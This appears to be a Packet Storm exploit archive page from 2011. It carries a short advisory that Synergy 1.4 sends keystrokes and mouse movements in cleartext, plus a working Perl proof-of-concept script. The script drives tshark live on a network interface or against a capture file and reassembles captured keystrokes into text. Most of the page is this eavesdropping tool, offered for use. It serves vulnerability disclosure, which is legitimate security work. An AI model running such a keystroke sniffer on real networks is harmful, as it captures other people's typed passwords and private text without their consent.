what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Synergy 1.4 Protocol Cleartext Weakness Proof Of Concept

Synergy 1.4 Protocol Cleartext Weakness Proof Of Concept
Posted Apr 7, 2011
Authored by Sw1tCh

Proof of concept exploit for Synergy version 1.4 that records keystrokes and mouse movements.

tags | exploit, proof of concept
SHA-256 | db83f185af928893b05ba89aa0a61dc9c2e04f651d28150ddd2a6937c182b5f7

Synergy 1.4 Protocol Cleartext Weakness Proof Of Concept

Change Mirror Download
# Exploit Title: Synergy Protocol cleartext weakness PoC
# Date:April 5th 2011
# Author: Sw1tCh
# Software Link: http://synergy-foss.org/
# Version: 1.4

# -= Info =-
*Synergy* is *Free and Open Source Software* that lets you easily share your
mouse and keyboard between multiple computers, where each computer has it's
own display. No special hardware is required, all you need is a local area
network. Synergy is supported on Windows, Mac OS X and Linux. [Source =~
Synergy-foss.org]

#-= The Advisory =-
Synergy's sends all keystrokes and mouse movements in clear text. This
presents a huge vulnerability because if anyone is capturing packets on the
network, they could eavesdrop on all information passed between the multiple
computers.

# -= PoC Script =-



#!/usr/bin/perl
#
# synergyCap.pl - Developed by Sw1tCh to show the insecurity in Synergy
Deskop Sharing application
# The program works a lot better when through a closed network of one type
of another
# [such as an SSH tunnel]
# [Note: The text isn't clear. Because of the protocol, text is sent in TCP
and even with protocol
# Standards, text does come out of order.
##########################
#
# Obligatory Shouts -> gen0cide, Scruffy, Griff, D00dl3, BilboFraggin's
#
##########################

use constant BANNER => q{

/ / synergyCap -> Live or Forensic extractor of text
passeed
/ / from computers using Synergy Screen sharing
/ <( - )> /
/ / PoC Developed by Sw1tCh 2011
/ / -> Need to work on my tshark filters...My perl is
better :)
/ /
Softward -> Synergy - http://synergy-foss.org/

Usage:
- synergyCap.pl -forensic -file [FILE]
- synergyCap.pl -live -interface [device {example eth0} ]

};


# ----- INCLUDES ----- #
use strict;
use warnings;
use Getopt::Long;
use Switch;
use Time::HiRes qw( usleep sleep );
use Term::ANSIColor qw(:constants);
local $Term::ANSIColor::AUTORESET = 1;

print BOLD BLUE BANNER;
print "\n";

my $forensic = 0;
my $live = 0;
my $options = "";
my $capChar = "";

GetOptions (
'forensic' => \$forensic ,
'live' => \$live ,
'file' => \my $pcap_file ,
'interface' => \my $interface ,

);

unless ( $ARGV[0] ) { print "ERROR : Bad file or Interface\n"; exit; }
unless ( $live || $forensic ) { print "ERROR : No Option Specified [Live /
or / Forensic \n"; exit; }


if ( $live =~ m/1/ ) { $options = "i"; }
elsif ( $forensic =~ m/1/ ) { $options = "r"; }

open( TSHARK , "tshark -". $options . " " . $ARGV[0] ." -V |" ) or die
"Failed to open TSHARK: $!";

while( <TSHARK> )
{
if ($_ =~ /Key Id/) {

if( $_ =~ s/Key Id\x3A\s//) {
if ($_ < 128){
print " " . chr($_) . "\n";
$capChar = $capChar. chr($_);
}
}
}

}

print "\n\n$capChar ";
print "\n---+ Completed +--- \n";

close( TSHARK );




#Credits: Sw1tCh

#Shoutouts : gen0cide, Scruffy, Griff, D00dl3, BilboFraggin's

























--
NULL,


NULL NULL
NULL NULL NULL NULL NULL
NULL.NULL
(NULL) NULL - NULL
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close